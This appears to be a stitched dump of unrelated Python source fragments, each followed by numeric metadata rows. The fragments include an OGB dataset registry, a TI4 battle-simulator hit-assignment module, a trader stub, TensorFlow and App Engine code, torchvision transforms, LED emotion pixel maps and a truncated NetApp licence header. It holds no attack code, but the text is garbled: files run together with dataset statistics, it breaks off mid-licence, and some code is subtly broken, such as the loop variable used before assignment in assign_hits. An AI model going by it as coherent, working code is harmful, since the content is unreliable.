dataset_dict[name] = {"num tasks": 1, "num classes": 349, "eval metric": "acc", "task type": "multiclass classification"}
dataset_dict[name]["download_name"] = "mag"
dataset_dict[name]["version"] = 2
dataset_dict[name]["url"] = "https://snap.stanford.edu/ogb/data/nodeproppred/"+dataset_dict[name]["download_name"]+".zip"
dataset_dict[name]["add_inverse_edge"] = False
dataset_dict[name]["has_node_attr"] = True
dataset_dict[name]["has_edge_attr"] = False
dataset_dict[name]["split"] = "time"
dataset_dict[name]["additional node files"] = 'node_year'
dataset_dict[name]['additional edge files'] = 'edge_reltype'
dataset_dict[name]['is hetero'] = True
### add meta-information about paper category prediction in huge paper citation network
name = "ogbn-papers100M"
dataset_dict[name] = {"num tasks": 1, "num classes": 172, "eval metric": "acc", "task type": "multiclass classification"}
dataset_dict[name]["download_name"] = "papers100M"
dataset_dict[name]["version"] = 1
dataset_dict[name]["url"] = "https://snap.stanford.edu/ogb/data/nodeproppred/"+dataset_dict[name]["download_name"]+".zip"
dataset_dict[name]["add_inverse_edge"] = False
dataset_dict[name]["has_node_attr"] = True
dataset_dict[name]["has_edge_attr"] = False
dataset_dict[name]["split"] = "time"
dataset_dict[name]["additional node files"] = 'node_year'
dataset_dict[name]['additional edge files'] = 'None'
dataset_dict[name]['is hetero'] = False
df = pd.DataFrame(dataset_dict)
# saving the dataframe
df.to_csv("master.csv")
| 51.426829
| 131
| 0.741048
| 592
| 4,217
| 5.094595
| 0.180743
| 0.226127
| 0.298408
| 0.07626
| 0.829576
| 0.769562
| 0.724801
| 0.724801
| 0.679708
| 0.679708
| 0
| 0.007592
| 0.094143
| 4,217
| 82
| 132
| 51.426829
| 0.781937
| 0.165521
| 0
| 0.553846
| 0
| 0
| 0.421821
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.015385
| 0
| 0.015385
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c487fa3b1598de60dbf07c0af4f1a9d2b9b39be8
| 41
|
py
|
Python
|
installer/whimbrel/install/util/__init__.py
|
groboclown/whimbrel
|
1968cccf4888ef893686a812ed729205a31d2a12
|
[
"Apache-2.0"
] | null | null | null |
installer/whimbrel/install/util/__init__.py
|
groboclown/whimbrel
|
1968cccf4888ef893686a812ed729205a31d2a12
|
[
"Apache-2.0"
] | null | null | null |
installer/whimbrel/install/util/__init__.py
|
groboclown/whimbrel
|
1968cccf4888ef893686a812ed729205a31d2a12
|
[
"Apache-2.0"
] | null | null | null |
from . import out
from . import copy
| 10.25
| 19
| 0.658537
| 6
| 41
| 4.5
| 0.666667
| 0.740741
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.292683
| 41
| 3
| 20
| 13.666667
| 0.931034
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
673402bc79b48f0a831cef4d914b3b7e9e8743b0
| 4,093
|
py
|
Python
|
app/calculator/assign.py
|
EBaalhuis/TI4_battle_sim
|
c139ca71d98f320f780cbfc6297d5d1d1ad08a0b
|
[
"MIT"
] | 3
|
2021-05-12T20:32:06.000Z
|
2022-02-25T21:29:23.000Z
|
app/calculator/assign.py
|
EBaalhuis/TI4_battle_sim
|
c139ca71d98f320f780cbfc6297d5d1d1ad08a0b
|
[
"MIT"
] | 109
|
2021-01-10T11:09:11.000Z
|
2021-03-25T20:33:13.000Z
|
app/calculator/assign.py
|
EBaalhuis/TI4_battle_sim
|
c139ca71d98f320f780cbfc6297d5d1d1ad08a0b
|
[
"MIT"
] | 1
|
2021-03-25T00:49:12.000Z
|
2021-03-25T00:49:12.000Z
|
import app.calculator.faction_abilities as faction_abilities
def assign_hits(units, hits, risk_direct_hit, faction, options, attacker):
if hits <= 0:
return units, options
# Shields Holding
if options["att_shields_active"] and attacker:
options["att_shields_active"] = False
hits -= 2
if options["def_shields_active"] and not attacker:
options["def_shields_active"] = False
hits -= 2
# Letnev flagship (sustain)
if faction == "Letnev":
units, hits = faction_abilities.letnev_flagship_sustain(units, hits, risk_direct_hit)
for u in units:
if hits <= 0:
return units, options
hits -= u.use_sustain(risk_direct_hit)
while hits > 0 and units:
if units[0].sustain:
hits -= u.use_sustain(risk_direct_hit=True)
# Once one ship sustains and is not Direct Hit, assume its safe
return assign_hits(units, hits, True, faction, options, attacker)
else:
# Check if only PDS are left
if units[0].name == "pds" and not units[0].ground: # second part rules out Titans PDS
return units, options
# Yin agent
if (options["att_yin_agent_active"] and attacker) or (options["def_yin_agent_active"] and not attacker) \
and units[0].name in ["destroyer", "cruiser"]:
units, options = faction_abilities.yin_agent(units, units[0], faction, options, attacker)
else:
del units[0]
hits -= 1
return units, options
def assign_fighters_only(units, hits, options, attacker):
if hits <= 0:
return units, options
# Shields Holding
if options["att_shields_active"] and attacker:
options["att_shields_active"] = False
hits -= 2
if options["def_shields_active"] and not attacker:
options["def_shields_active"] = False
hits -= 2
result = [u for u in units]
for u in units:
if hits <= 0:
return result, options
if u.fighter or u.name == "virtual":
result.remove(u)
hits -= 1
return result, options
def assign_nonfighters_first(units, hits, risk_direct_hit, faction, options, attacker):
if hits <= 0:
return units, options
# Shields Holding
if options["att_shields_active"] and attacker:
options["att_shields_active"] = False
hits -= 2
if options["def_shields_active"] and not attacker:
options["def_shields_active"] = False
hits -= 2
# Letnev flagship (sustain)
if faction == "Letnev":
units, hits = faction_abilities.letnev_flagship_sustain(units, hits, risk_direct_hit)
for u in units:
if hits <= 0:
return units, options
hits -= u.use_sustain(risk_direct_hit)
fighters = list(filter(lambda x: x.name == "fighter", units))
non_fighters = list(filter(lambda x: x.name != "fighter", units))
for u in non_fighters:
if hits <= 0:
return units, options
if u.name == "pds" and not u.ground: # second part rules out Titans PDS
break
if u.sustain:
hits -= u.use_sustain(risk_direct_hit=True)
# Once one ship sustains and is not Direct Hit, assume its safe
return assign_nonfighters_first(units, hits, True, faction, options, attacker)
else:
# Yin agent
if (options["att_yin_agent_active"] and attacker) or (options["def_yin_agent_active"] and not attacker) \
and units[0].name in ["destroyer", "cruiser"]:
units, options = faction_abilities.yin_agent(units, u, faction, options, attacker)
else:
units.remove(u)
hits -= 1
for u in fighters:
if hits <= 0:
return units, options
if u.name == "pds" and not u.ground: # second part rules out Titans PDS
return units, options
units.remove(u)
hits -= 1
return units, options
| 33.826446
| 117
| 0.602981
| 519
| 4,093
| 4.60501
| 0.146435
| 0.065272
| 0.082845
| 0.043515
| 0.855649
| 0.800837
| 0.800837
| 0.768201
| 0.758159
| 0.723013
| 0
| 0.009145
| 0.305399
| 4,093
| 120
| 118
| 34.108333
| 0.831516
| 0.090154
| 0
| 0.758621
| 0
| 0
| 0.09973
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.034483
| false
| 0
| 0.011494
| 0
| 0.218391
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
67ad0b685e1569fd4450b8b9b3b6af12b4d3d79b
| 182
|
py
|
Python
|
order_routing/base_trader.py
|
qplum/trade-analysis
|
c2a641ea0f49da4b29098b33a3b7cbeedfc2b866
|
[
"MIT"
] | 32
|
2016-07-01T13:16:39.000Z
|
2021-08-17T16:18:59.000Z
|
order_routing/base_trader.py
|
VCGJake/trade-analysis
|
c2a641ea0f49da4b29098b33a3b7cbeedfc2b866
|
[
"MIT"
] | 2
|
2016-06-30T14:37:21.000Z
|
2017-09-13T16:19:23.000Z
|
order_routing/base_trader.py
|
VCGJake/trade-analysis
|
c2a641ea0f49da4b29098b33a3b7cbeedfc2b866
|
[
"MIT"
] | 18
|
2016-06-30T14:14:44.000Z
|
2018-10-13T05:13:17.000Z
|
class BaseTrader( object ):
def __init__( self, uid ):
self.uid = uid
def send_order( self, order ):
pass
def cancel_order( self, order ):
pass
| 18.2
| 36
| 0.565934
| 22
| 182
| 4.409091
| 0.5
| 0.14433
| 0.28866
| 0.371134
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.340659
| 182
| 9
| 37
| 20.222222
| 0.808333
| 0
| 0
| 0.285714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.428571
| false
| 0.285714
| 0
| 0
| 0.571429
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
db0ae63a5c6024f656a02f59efedfe6e4afa7536
| 1,323
|
py
|
Python
|
Keras_tensorflow_nightly/source2.7/tensorflow/tools/api/generator/api/feature_column/__init__.py
|
Con-Mi/lambda-packs
|
b23a8464abdd88050b83310e1d0e99c54dac28ab
|
[
"MIT"
] | 3
|
2019-04-01T11:03:04.000Z
|
2019-12-31T02:17:15.000Z
|
Keras_tensorflow_nightly/source2.7/tensorflow/tools/api/generator/api/feature_column/__init__.py
|
Con-Mi/lambda-packs
|
b23a8464abdd88050b83310e1d0e99c54dac28ab
|
[
"MIT"
] | 1
|
2021-04-15T18:46:45.000Z
|
2021-04-15T18:46:45.000Z
|
Keras_tensorflow_nightly/source2.7/tensorflow/tools/api/generator/api/feature_column/__init__.py
|
Con-Mi/lambda-packs
|
b23a8464abdd88050b83310e1d0e99c54dac28ab
|
[
"MIT"
] | 1
|
2021-09-23T13:43:07.000Z
|
2021-09-23T13:43:07.000Z
|
"""Imports for Python API.
This file is MACHINE GENERATED! Do not edit.
Generated by: tensorflow/tools/api/generator/create_python_api.py script.
"""
from tensorflow.python.feature_column.feature_column import bucketized_column
from tensorflow.python.feature_column.feature_column import categorical_column_with_hash_bucket
from tensorflow.python.feature_column.feature_column import categorical_column_with_identity
from tensorflow.python.feature_column.feature_column import categorical_column_with_vocabulary_file
from tensorflow.python.feature_column.feature_column import categorical_column_with_vocabulary_list
from tensorflow.python.feature_column.feature_column import crossed_column
from tensorflow.python.feature_column.feature_column import embedding_column
from tensorflow.python.feature_column.feature_column import indicator_column
from tensorflow.python.feature_column.feature_column import input_layer
from tensorflow.python.feature_column.feature_column import linear_model
from tensorflow.python.feature_column.feature_column import make_parse_example_spec
from tensorflow.python.feature_column.feature_column import numeric_column
from tensorflow.python.feature_column.feature_column import shared_embedding_columns
from tensorflow.python.feature_column.feature_column import weighted_categorical_column
| 69.631579
| 99
| 0.900983
| 178
| 1,323
| 6.365169
| 0.258427
| 0.321271
| 0.247132
| 0.333628
| 0.760812
| 0.760812
| 0.760812
| 0.760812
| 0.485437
| 0.275375
| 0
| 0
| 0.055178
| 1,323
| 19
| 100
| 69.631579
| 0.9064
| 0.108088
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 10
|
db14806c805561d0b7c539954aa0f7ff0ee432a6
| 950
|
py
|
Python
|
app/views/users.py
|
matrufsc2/matrufsc2
|
d8a32c532281cc2a09a26444bd5b8497bc578b18
|
[
"RSA-MD"
] | 4
|
2017-07-07T19:04:07.000Z
|
2018-07-04T18:03:49.000Z
|
app/views/users.py
|
matrufsc2/matrufsc2
|
d8a32c532281cc2a09a26444bd5b8497bc578b18
|
[
"RSA-MD"
] | 6
|
2015-02-27T03:21:02.000Z
|
2019-07-30T19:58:35.000Z
|
app/views/users.py
|
matrufsc2/matrufsc2
|
d8a32c532281cc2a09a26444bd5b8497bc578b18
|
[
"RSA-MD"
] | null | null | null |
from google.appengine.api import users
from app.views.api import serialize
__author__ = 'fernando'
def get_current_user():
is_authenticated = users.get_current_user() is not None
login_url = None
logout_url = None
if is_authenticated:
logout_url = users.create_logout_url("/")
else:
login_url = users.create_login_url("/")
return serialize({
"id": "current",
"is_authenticated": is_authenticated,
"login_url": login_url,
"logout_url": logout_url
})
def get_users():
is_authenticated = users.get_current_user() is not None
login_url = None
logout_url = None
if is_authenticated:
logout_url = users.create_logout_url("/")
else:
login_url = users.create_login_url("/")
return serialize([{
"id": "current",
"is_authenticated": is_authenticated,
"login_url": login_url,
"logout_url": logout_url
}])
| 26.388889
| 59
| 0.646316
| 115
| 950
| 4.965217
| 0.234783
| 0.140105
| 0.098074
| 0.084063
| 0.816112
| 0.816112
| 0.816112
| 0.816112
| 0.816112
| 0.816112
| 0
| 0
| 0.247368
| 950
| 35
| 60
| 27.142857
| 0.798601
| 0
| 0
| 0.709677
| 0
| 0
| 0.105263
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.064516
| false
| 0
| 0.064516
| 0
| 0.193548
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
db1f934b9ff999847ae575ddaead2519a110a688
| 1,167
|
py
|
Python
|
SDNet/data/transform.py
|
neolgu/Split-Detection-Network
|
7c8f75a10f56ff7b8e82d82af130780db402501b
|
[
"MIT"
] | 3
|
2021-05-26T07:55:27.000Z
|
2021-09-27T10:01:12.000Z
|
SDNet/data/transform.py
|
neolgu/Split-Detection-Network
|
7c8f75a10f56ff7b8e82d82af130780db402501b
|
[
"MIT"
] | 1
|
2021-06-13T08:24:19.000Z
|
2021-06-13T08:24:19.000Z
|
SDNet/data/transform.py
|
neolgu/Split-Detection-Network
|
7c8f75a10f56ff7b8e82d82af130780db402501b
|
[
"MIT"
] | null | null | null |
from torchvision import transforms
xception_data_transforms = {
'train': transforms.Compose([
transforms.Resize((299, 299)),
transforms.ToTensor(),
transforms.Normalize([0.5]*3, [0.5]*3)
]),
'val': transforms.Compose([
transforms.Resize((299, 299)),
transforms.ToTensor(),
transforms.Normalize([0.5] * 3, [0.5] * 3)
]),
'test': transforms.Compose([
transforms.Resize((299, 299)),
transforms.ToTensor(),
transforms.Normalize([0.5] * 3, [0.5] * 3)
]),
}
resnet18_data_transforms = {
'train': transforms.Compose([
transforms.Resize((224, 224)),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),
]),
'val': transforms.Compose([
transforms.Resize((224, 224)),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),
]),
'test': transforms.Compose([
transforms.Resize((224, 224)),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),
]),
}
| 32.416667
| 84
| 0.574122
| 136
| 1,167
| 4.897059
| 0.191176
| 0.153153
| 0.243243
| 0.297297
| 0.929429
| 0.908408
| 0.908408
| 0.851351
| 0.851351
| 0.851351
| 0
| 0.143017
| 0.233076
| 1,167
| 36
| 85
| 32.416667
| 0.601117
| 0
| 0
| 0.857143
| 0
| 0
| 0.020548
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.028571
| 0
| 0.028571
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
c059a26d34d18e3b857e90ae29a3a2f1ddc7ec81
| 9,027
|
py
|
Python
|
alien/lib/emotions_library.py
|
oowais/MCP-Alien-Arduino-Code
|
8613843ee3d602fa62c2d13e411cd423ce5b7bf7
|
[
"MIT"
] | null | null | null |
alien/lib/emotions_library.py
|
oowais/MCP-Alien-Arduino-Code
|
8613843ee3d602fa62c2d13e411cd423ce5b7bf7
|
[
"MIT"
] | 36
|
2018-12-20T00:55:49.000Z
|
2019-01-28T22:39:08.000Z
|
alien/lib/emotions_library.py
|
oowais/MCP-Alien-Arduino-Code
|
8613843ee3d602fa62c2d13e411cd423ce5b7bf7
|
[
"MIT"
] | null | null | null |
BOOT = [(0, 0), (0, 1), (0, 2), (0, 3), (0, 4), (0, 5), (0, 6), (0, 7),
(1, 0), (1, 1), (1, 2), (1, 3), (1, 4), (1, 5), (1, 6), (1, 7),
(2, 0), (2, 1), (2, 2), (2, 3), (2, 4), (2, 5), (2, 6), (2, 7),
(3, 0), (3, 1), (3, 2), (3, 3), (3, 4), (3, 5), (3, 6), (3, 7),
(4, 0), (4, 1), (4, 2), (4, 3), (4, 4), (4, 5), (4, 6), (4, 7),
(5, 0), (5, 1), (5, 2), (5, 3), (5, 4), (5, 5), (5, 6), (5, 7),
(6, 0), (6, 1), (6, 2), (6, 3), (6, 4), (6, 5), (6, 6), (6, 7),
(7, 0), (7, 1), (7, 2), (7, 3), (7, 4), (7, 5), (7, 6), (7, 7)]
LEFT_BOOT_1 = [(0, 3), (0, 4), (0, 5), (0, 6)]
LEFT_BOOT_2 = [(1, 2), (1, 7)]
LEFT_BOOT_3 = [(2, 1), (2, 4), (2, 5), (2, 7)]
LEFT_BOOT_4 = [(3, 0), (3, 4), (3, 5), (3, 7)]
LEFT_BOOT_5 = [(4, 0), (4, 7)]
LEFT_BOOT_6 = [(5, 0), (5, 7)]
LEFT_BOOT_7 = [(6, 0), (6, 7)]
LEFT_BOOT_8 = [(7, 1), (7, 2), (7, 3), (7, 4), (7, 5), (7, 6)]
RIGHT_BOOT_1 = [(0, 1), (0, 2), (0, 3), (0, 4)]
RIGHT_BOOT_2 = [(1, 0), (1, 5)]
RIGHT_BOOT_3 = [(2, 0), (2, 3), (2, 4), (2, 6)]
RIGHT_BOOT_4 = [(3, 0), (3, 3), (3, 4), (3, 7)]
RIGHT_BOOT_5 = [(4, 0), (4, 7)]
RIGHT_BOOT_6 = [(5, 0), (5, 7)]
RIGHT_BOOT_7 = [(6, 0), (6, 7)]
RIGHT_BOOT_8 = [(7, 1), (7, 2), (7, 3), (7, 4), (7, 5), (7, 6)]
LEFT_NORMAL = [(0, 3), (0, 4), (0, 5), (0, 6),
(1, 2), (1, 7),
(2, 1), (2, 4), (2, 5), (2, 7),
(3, 0), (3, 4), (3, 5), (3, 7),
(4, 0), (4, 7),
(5, 0), (5, 7),
(6, 0), (6, 7),
(7, 1), (7, 2), (7, 3), (7, 4), (7, 5), (7, 6)]
RIGHT_NORMAL = [(0, 1), (0, 2), (0, 3), (0, 4),
(1, 0), (1, 5),
(2, 0), (2, 3), (2, 4), (2, 6),
(3, 0), (3, 3), (3, 4), (3, 7),
(4, 0), (4, 7),
(5, 0), (5, 7),
(6, 0), (6, 7),
(7, 1), (7, 2), (7, 3), (7, 4), (7, 5), (7, 6)]
LEFT_NORMAL_2 = [(0, 3), (0, 4), (0, 5), (0, 6),
(1, 2), (1, 7),
(2, 1), (2, 3), (2, 4), (2, 7),
(3, 0), (3, 3), (3, 4), (3, 7),
(4, 0), (4, 7),
(5, 0), (5, 7),
(6, 0), (6, 7),
(7, 1), (7, 2), (7, 3), (7, 4), (7, 5), (7, 6)]
RIGHT_NORMAL_2 = [(0, 1), (0, 2), (0, 3), (0, 4),
(1, 0), (1, 5),
(2, 0), (2, 2), (2, 3), (2, 6),
(3, 0), (3, 2), (3, 3), (3, 7),
(4, 0), (4, 7),
(5, 0), (5, 7),
(6, 0), (6, 7),
(7, 1), (7, 2), (7, 3), (7, 4), (7, 5), (7, 6)]
LEFT_HAPPY = [(0, 3), (0, 4), (0, 5), (0, 6),
(1, 2), (1, 7),
(2, 1), (2, 7),
(3, 0), (3, 7),
(4, 0), (4, 3), (4, 4), (4, 7),
(5, 0), (5, 2), (5, 5), (5, 7),
(6, 0), (6, 7),
(7, 1), (7, 2), (7, 3), (7, 4), (7, 5), (7, 6)]
RIGHT_HAPPY = [(0, 1), (0, 2), (0, 3), (0, 4),
(1, 0), (1, 5),
(2, 0), (2, 6),
(3, 0), (3, 7),
(4, 0), (4, 3), (4, 4), (4, 7),
(5, 0), (5, 2), (5, 5), (5, 7),
(6, 0), (6, 7),
(7, 1), (7, 2), (7, 3), (7, 4), (7, 5), (7, 6)]
LEFT_HAPPY_2 = [(0, 3), (0, 4), (0, 5), (0, 6),
(1, 2), (1, 7),
(2, 1), (2, 7),
(3, 0), (3, 3), (3, 4), (3, 7),
(4, 0), (4, 2), (4, 5), (4, 7),
(5, 0), (5, 7),
(6, 0), (6, 7),
(7, 1), (7, 2), (7, 3), (7, 4), (7, 5), (7, 6)]
RIGHT_HAPPY_2 = [(0, 1), (0, 2), (0, 3), (0, 4),
(1, 0), (1, 5),
(2, 0), (2, 6),
(3, 0), (3, 3), (3, 4), (3, 7),
(4, 0), (4, 2), (4, 5), (4, 7),
(5, 0), (5, 7),
(6, 0), (6, 7),
(7, 1), (7, 2), (7, 3), (7, 4), (7, 5), (7, 6)]
LEFT_ANGRY = [(0, 2),
(1, 1), (1, 2), (1, 3),
(2, 1), (2, 2), (2, 3), (2, 4),
(3, 1), (3, 2), (3, 3), (3, 4), (3, 5),
(4, 1), (4, 2), (4, 3), (4, 4), (4, 5), (4, 6),
(5, 2), (5, 3), (5, 4), (5, 5), (5, 6), (5, 7),
(6, 3), (6, 4), (6, 5), (6, 6)]
RIGHT_ANGRY = [(0, 5),
(1, 4), (1, 5), (1, 6),
(2, 3), (2, 4), (2, 5), (2, 6),
(3, 2), (3, 3), (3, 4), (3, 5), (3, 6),
(4, 1), (4, 2), (4, 3), (4, 4), (4, 5), (4, 6),
(5, 0), (5, 1), (5, 2), (5, 3), (5, 4), (5, 5),
(6, 1), (6, 2), (6, 3), (6, 4)]
LEFT_ANGRY_2 = [(0, 2),
(1, 1), (1, 3),
(2, 1), (2, 4),
(3, 1), (3, 3), (3, 5),
(4, 1), (4, 3), (4, 4), (4, 6),
(5, 2), (5, 7),
(6, 3), (6, 4), (6, 5), (6, 6)]
RIGHT_ANGRY_2 = [(0, 5),
(1, 4), (1, 6),
(2, 3), (2, 6),
(3, 2), (3, 4), (3, 6),
(4, 1), (4, 3), (4, 4), (4, 6),
(5, 0), (5, 5),
(6, 1), (6, 2), (6, 3), (6, 4)]
LEFT_SLEEPY = [(1, 1), (1, 2), (1, 3), (1, 4), (1, 5), (1, 6),
(2, 2),
(3, 3),
(4, 4),
(5, 5),
(6, 1), (6, 2), (6, 3), (6, 4), (6, 5), (6, 6)]
RIGHT_SLEEPY = [(1, 1), (1, 2), (1, 3), (1, 4), (1, 5), (1, 6),
(2, 2),
(3, 3),
(4, 4),
(5, 5),
(6, 1), (6, 2), (6, 3), (6, 4), (6, 5), (6, 6)]
LEFT_SAD = [(0, 3), (0, 4), (0, 5), (0, 6),
(1, 2), (1, 7),
(2, 1), (2, 7),
(3, 0), (3, 2), (3, 3), (3, 4), (3, 5), (3, 7),
(4, 0), (4, 3), (4, 4), (4, 7),
(5, 0), (5, 3), (5, 4), (5, 7),
(6, 0), (6, 3), (6, 4), (6, 7),
(7, 1), (7, 2), (7, 3), (7, 4), (7, 5), (7, 6)]
RIGHT_SAD = [(0, 1), (0, 2), (0, 3), (0, 4),
(1, 0), (1, 5),
(2, 0), (2, 6),
(3, 0), (3, 2), (3, 3), (3, 4), (3, 5), (3, 7),
(4, 0), (4, 3), (4, 4), (4, 7),
(5, 0), (5, 3), (5, 4), (5, 7),
(6, 0), (6, 3), (6, 4), (6, 7),
(7, 1), (7, 2), (7, 3), (7, 4), (7, 5), (7, 6)]
LEFT_SURPRISED = [(0, 3), (0, 4), (0, 5), (0, 6),
(1, 2), (1, 7),
(2, 1), (2, 3), (2, 4), (2, 7),
(3, 0), (3, 2), (3, 5), (3, 7),
(4, 0), (4, 2), (4, 5), (4, 7),
(5, 0), (5, 3), (5, 4), (5, 7),
(6, 0), (6, 7),
(7, 1), (7, 2), (7, 3), (7, 4), (7, 5), (7, 6)]
RIGHT_SURPRISED = [(0, 1), (0, 2), (0, 3), (0, 4),
(1, 0), (1, 5),
(2, 0), (2, 3), (2, 4), (2, 6),
(3, 0), (3, 2), (3, 5), (3, 7),
(4, 0), (4, 2), (4, 5), (4, 7),
(5, 0), (5, 3), (5, 4), (5, 7),
(6, 0), (6, 7),
(7, 1), (7, 2), (7, 3), (7, 4), (7, 5), (7, 6)]
LEFT_SURPRISED_2 = [(0, 3), (0, 4), (0, 5), (0, 6),
(1, 2), (1, 7),
(2, 1), (2, 7),
(3, 0), (3, 3), (3, 4), (3, 7),
(4, 0), (4, 3), (4, 4), (4, 7),
(5, 0), (5, 7),
(6, 0), (6, 7),
(7, 1), (7, 2), (7, 3), (7, 4), (7, 5), (7, 6)]
RIGHT_SURPRISED_2 = [(0, 1), (0, 2), (0, 3), (0, 4),
(1, 0), (1, 5),
(2, 0), (2, 6),
(3, 0), (3, 3), (3, 4), (3, 7),
(4, 0), (4, 3), (4, 4), (4, 7),
(5, 0), (5, 7),
(6, 0), (6, 7),
(7, 1), (7, 2), (7, 3), (7, 4), (7, 5), (7, 6)]
LEFT_LOW_POWER = [(0, 3), (0, 4),
(1, 2), (1, 3), (1, 4), (1, 5),
(2, 2), (2, 5),
(3, 2), (3, 5),
(4, 2), (4, 5),
(5, 2), (5, 5),
(6, 2), (6, 3), (6, 4), (6, 5)]
RIGHT_LOW_POWER = [(0, 3), (0, 4),
(1, 2), (1, 3), (1, 4), (1, 5),
(2, 2), (2, 5),
(3, 2), (3, 5),
(4, 2), (4, 5),
(5, 2), (5, 3), (5, 4), (5, 5),
(6, 2), (6, 3), (6, 4), (6, 5)]
LEFT_LOW_POWER_2 = [(0, 3), (0, 4),
(1, 2), (1, 3), (1, 4), (1, 5),
(2, 2), (2, 5),
(3, 2), (3, 5),
(4, 2), (4, 5),
(5, 2), (5, 3), (5, 4), (5, 5),
(6, 2), (6, 3), (6, 4), (6, 5)]
RIGHT_LOW_POWER_2 = [(0, 3), (0, 4),
(1, 2), (1, 3), (1, 4), (1, 5),
(2, 2), (2, 5),
(3, 2), (3, 5),
(4, 2), (4, 5),
(5, 2), (5, 5),
(6, 2), (6, 3), (6, 4), (6, 5)]
SCAN_LINE_HORIZ_I = lambda i : [(i, j) for j in range(8)]
| 38.742489
| 71
| 0.214468
| 1,528
| 9,027
| 1.219241
| 0.018979
| 0.040794
| 0.05475
| 0.045089
| 0.899624
| 0.866881
| 0.834675
| 0.831455
| 0.785293
| 0.761675
| 0
| 0.295967
| 0.464385
| 9,027
| 232
| 72
| 38.909483
| 0.089349
| 0
| 0
| 0.663415
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
220c3ea9cbe8d711f1326ec778d1edb2301d8ebd
| 61,719
|
py
|
Python
|
netapp/santricity/api/symbol/e_api.py
|
NetApp/santricity-webapi-pythonsdk
|
1d3df4a00561192f4cdcdd1890f4d27547ed2de2
|
[
"BSD-3-Clause-Clear"
] | 5
|
2016-08-23T17:52:22.000Z
|
2019-05-16T08:45:30.000Z
|
netapp/santricity/api/symbol/e_api.py
|
NetApp/santricity-webapi-pythonsdk
|
1d3df4a00561192f4cdcdd1890f4d27547ed2de2
|
[
"BSD-3-Clause-Clear"
] | 2
|
2016-11-10T05:30:21.000Z
|
2019-04-05T15:03:37.000Z
|
netapp/santricity/api/symbol/e_api.py
|
NetApp/santricity-webapi-pythonsdk
|
1d3df4a00561192f4cdcdd1890f4d27547ed2de2
|
[
"BSD-3-Clause-Clear"
] | 7
|
2016-08-25T16:11:44.000Z
|
2021-02-22T05:31:25.000Z
|
#!/usr/bin/env python
# coding: utf-8
"""
EApi.py
The Clear BSD License
Copyright (c) – 2016, NetApp, Inc. All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted (subject to the limitations in the disclaimer below) provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
* Neither the name of NetApp, Inc. nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
